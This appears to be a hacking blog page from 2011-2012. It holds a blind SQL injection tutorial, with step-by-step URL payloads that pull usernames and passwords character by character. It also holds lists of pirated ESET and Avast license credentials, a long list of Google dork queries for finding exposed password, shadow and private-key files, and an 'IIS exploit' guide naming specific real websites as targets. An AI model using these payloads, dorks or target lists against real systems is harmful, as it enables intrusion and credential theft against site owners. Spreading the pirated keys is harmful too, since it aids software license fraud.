Cpanel Hosting

Thursday, 23 February 2012

Blind SQL Injection Tutorial !!!!!





Blind injection is a little more complicated the classic injection but it can be done :D 


It's some what hard but good to Learn 


1) http://www.site.com/news.php?id=5


when we execute this, we see some page and articles on that page, pictures etc... then when we want to test it for blind sql injection attack


2) http://www.site.com/news.php?id=5 and 1=1 <--- this is always true


and the page loads normally, that's ok.now the real test


3) http://www.site.com/news.php?id=5 and 1=2 <--- this is false


so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.Hacker's Work Started :) 


1) Get the MySQL version


to get the version in blind attack we use substring 
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4


this should return TRUE if the version of MySQL is 4.replace 4 with 5, and if query return TRUE then the version is 5. 
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5


2) Test if subselect works 
when select don't work then we use subselect 
i.e
http://www.site.com/news.php?id=5 and (select 1)=1 


if page loads normally then subselects work.then we gonna see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1


if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.


3). Check table and column names.This is part when guessing is the best friend for Hacker ...
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)


then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)


let's say that we have found that table name is users, now what we need is column name. 
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e.
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1


if the page loads normally we know that column name is password (if we get false then try common names or just guess) 
here we merge 1 with the column password, then substring returns the first character (,1,1)




4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80


ok this here pulls the first character from first user in table users. 
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value and then compare it with simbol greater then > .
 so if the ascii char greater then 80, the page loads normally. (TRUE)
 we keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95


we get TRUE, keep incrementing


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98


TRUE again, higher


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99


FALSE!!!


so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.


then let's check the second character.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99


Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99


TRUE, the page loads normally, higher.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107


FALSE, lower number.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104


TRUE, higher.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105


FALSE!!!


we know that the second character is char(105) and that is 'i'. We have 'ci' so far
 so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).
 There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,
 cause that makes you better SQL INJECTOR :D


NOTE: This is just for Educational Purpose.

Tuesday, 6 December 2011

ESET Nod32 Keys Username And Password !!!

Hello Friends,
Here are  some Fresh Username and Password for ESET NOD32 Antivirus.. :-
)

Username: EAV-51526916
Password: kpvr48kr5n
Expiration: 13/03/2017

Username: EAV-54108373
Password: sm6rr8rmdj
Expiration: 29/04/2017

Username: EAV-54108377
Password: pnkxjm4rua
Expiration: 29/04/2017

Username: EAV-54108379
Password: vckucfdev5
Expiration: 29/04/2017

Username: TRIAL-56225335
Password: 78c5pfcrhn
Expiration: 29/12/2011

Username: TRIAL-56225342
Password: ts3a7caesf
Expiration: 29/12/2011

Username: TRIAL-56225354
Password: auvdaptrtd
Expiration: 29/12/2011

Username: TRIAL-56225364
Password: 54jfje4664
Expiration: 29/12/2011

Username: TRIAL-56277215
Password: 68kt7taxre
Expiration: 30/12/2011

Username: TRIAL-56277229
Password: dsan686r5r
Expiration: 30/12/2011

Username: TRIAL-56277239
Password: a3vrexd6ee
Expiration: 30/12/2011

Username: TRIAL-56277247
Password: jdcru3bmxs
Expiration: 30/12/2011

Username: TRIAL-56277259
Password: rs826jj82u
Expiration: 30/12/2011

Username: TRIAL-56277449
Password: 2xv2s3tfu3
Expiration: 30/12/2011

Username: TRIAL-56277453
Password: dbusepfuxp
Expiration: 30/12/2011

Username: TRIAL-56277460
Password: t7j44r4t7p
Expiration: 30/12/2011

Thursday, 1 December 2011

Free Antivirus Avast 4.8 Professional License Keys !!!

Hello Friends ,

 Today I will Give you Avast 4.8 Professional License Keys !!



1) First Download Avast
2) Then Install The Antivirus .
3) After that go to Maintenance ==> Registration ==> Insert the License Key ..
 
Serials last till to 1 may 2012!

S/N:W3446436R8800P1106-FX9VZPYF
S/N:W9685010R8800L1106-ZVDWCSCK
S/N:W3518199R8800K1106-WNYVBKA6
S/N:W9237226R8800E1106-M8X7LFND
S/N:W1112550R8800F1106-HD4RXPKT
S/N:W2548301R8800J1106-LUF4R92C
S/N:W9465601R8800U1106-2R4XVTFY
S/N:W7760656R8800A1106-398KP8FZ
S/N:W9654686R8800U1106-6L51HC20
S/N:W8598235R8800D1106-BMCW3VNR
S/N:S9097868R9097F1106-CRUDS1Y2  

 Serials Last till to 2013-2016 years

S/N:W7444164R9965A0911-KAJBBSDL
S/N:W1003130R9975A0912-RCUR86KL
S/N:W5299231R9973A0911-4PN0Y545
S/N:W7630705R9946A0912-D3EFM38L
S/N:W4264775R9967A0911-6ZSDBUL9
S/N:S8128161R9977A0911-FAM7JJH8
S/N:S1464458R9970A0912-9M3D30L4
S/N:S1122519R9970A0911-2WLUXS0Y
S/N:S1902164R9954A0911-7FNEU1BC
S/N:C5101589R9945A0910-PX0H0W8S
S/N:C2080008R9941A0911-N9H4S8YM
S/N:C7987628R9972A0910-BE721D8S







Wednesday, 30 November 2011

Password Search Queries using Google Dork !!!

"admin account info" filetype:log
! Host=*.* intext :enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl: (service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password =*" "http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site: sourceforge.net
"parent directory" +proftpdpasswd
"powered by ducalendar" -site:duware.com "Powered by Duclassified" -site: duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" - site:duware.com
"Powered by Dudirectory" -site:duware.com "powered by dudownload" -site: duware.com
"Powered By Elite Forum Version *.*"
"Powered by Link Department"
"sets mode: +k"
"your password is" filetype:log
" Powered by DUpaypal" -site: duware.com
allinurl: admin mdb auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext : the
etc (index.of)
ext:asa | ext:bak intext :uid intext :pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID=" ext:ini eudora.ini
ext:ini Version=4.0.0.4 password ext:passwd -intext :the - sample -example
ext:txt inurl:unattend. txt
ext:yml database inurl:config filetype:bak createobject sa
filetype: bak inurl:"htaccess|passwd|shadow| htusers"
filetype:cfg mrtg "target[*]" - sample -cvs -example
filetype:cfm "cfapplication name" password filetype: conf oekakibbs
filetype:conf slapd.conf filetype:config config intext : appSettings "User ID"
filetype:dat "password .dat"
filetype:dat inurl:Sites. dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext : mysql_connect
filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl: flashFXP.ini
filetype:ini ServUDaemon filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password .log"
filetype:mdb inurl: users.mdb
filetype:mdb wwforum filetype:netrc password filetype:pass pass intext :userid
filetype:pem intext : private
filetype:properties inurl:db intext :password filetype:pwd service filetype:pwl pwl
filetype:reg reg +intext :"defaultusername" +intext
:"defaultpassword"
filetype:reg reg +intext :”WINVNC3”
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password )
filetype:sql ("values * MD5" | "values * password " | "values * encrypt";)
filetype:sql ("passwd values" | " password values" | "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password filetype:url +inurl:"ftp://" +inurl:";@"
filetypels username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext
:"enable password 7"
intext :"enable secret 5 {:content:}quot;
intext
:"powered by EZGuestbook"
intext
:"powered by Web Wiz Journal" intitle:"index of" intext :connect.inc intitle:"index of" intext :globals.inc intitle:"Index of" passwords modified intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql. default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl: (add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle: index.of administrators.pwd
intitle: Index.of etc shadow
intitle:index.of intext :"secring.skr"|"secring. pgp"|"secring.bak"
intitle:rapidshare intext :login
inurl:"calendarscript/users. txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC. DAT" intext :"password "
inurl:"Sites. dat"+"PASS="
inurl:"slapd.conf" intext
:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext :"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial. conf" intext :"password "
inurl:/db/main. mdb
inurl:/wwwboard
inurl:/yabb/ Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar. cfg
inurl:chap-secrets -cvs
inurl:config. php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd - man
inurl:nuke filetype:sql
inurl:ospfd. conf intext :password -sample -test - tutorial -download
inurl:pap-secrets - cvs
inurl:pass.dat
inurl:perform filetype: ini
inurl:perform.ini filetype:ini
inurl: secring ext:skr | ext:pgp | ext:bak
inurl: server.cfg rcon password inurl: ventrilo_srv.ini adminpassword
inurl: vtund.conf intext :pass -cvs
inurl:zebra. conf intext :password -sample -test - tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified master.passwd
mysql history files NickServ registration passwords
passlist passlist.txt (a better way)
passwd passwd / etc (reliable)
people.lst psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password = filetype:ica

Friday, 25 November 2011

How to Hack webisites using IIS Exploit !!!

Hello friends today  i am posting very easy technique of web hacking using IIS Exploit.
1) Go to Start ==> My Network Places ==> Add a Network Place


2) Click om Next ==> Choose Another network Location.
 3) Click on Next ==> Now type the Vulnerable Website address.


After that Click on next.

Click Next ==> Finish..
After that you can see it from My Network Places..


Here are some IIS Vulnerable Website..

http://disk.hzyhzhx.com
http://disk.hzyhzhx.com/
http://ayatolahkhamenae.parniansis.com/
http://bahadori1.parniansis.com/
http://beheshti.parniansis.com/
http://beheshti1.parniansis.com/
http://bentolhoda1.parniansis.com/
http://bitaraf.parniansis.com/
http://derakhshan.parniansis.com/
http://derakhshan1.parniansis.com/
http://derakhshan2.parniansis.com/
http://derakhshan3.parniansis.com/
http://ebnesina.parniansis.com/
http://emamali.parniansis.com/
http://emkhaleghiyeyzd.parniansis.com/